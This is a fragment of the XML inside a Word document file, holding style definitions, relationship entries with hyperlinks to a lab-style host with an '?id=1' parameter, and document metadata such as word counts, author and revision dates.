    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00AE5C28"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ac">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00FC45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1">
    <w:name w:val="Grid Table 5 Dark Accent 1"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="00CF2A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4-1">
    <w:name w:val="Grid Table 4 Accent 1"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="009710D5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0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hiq8003.ia.aqlab.cn/?id=1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rhiq8003.ia.aqlab.cn/?id=1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rhiq8003.ia.aqlab.cn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rhiq8003.ia.aqlab.cn/?id=1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rhiq8003.ia.aqlab.cn/?id=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627</Words>
  <Characters>3579</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>29</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Li Maxpicca</cp:lastModifiedBy>
  <cp:revision>264</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-09-11T17:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-19T14:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>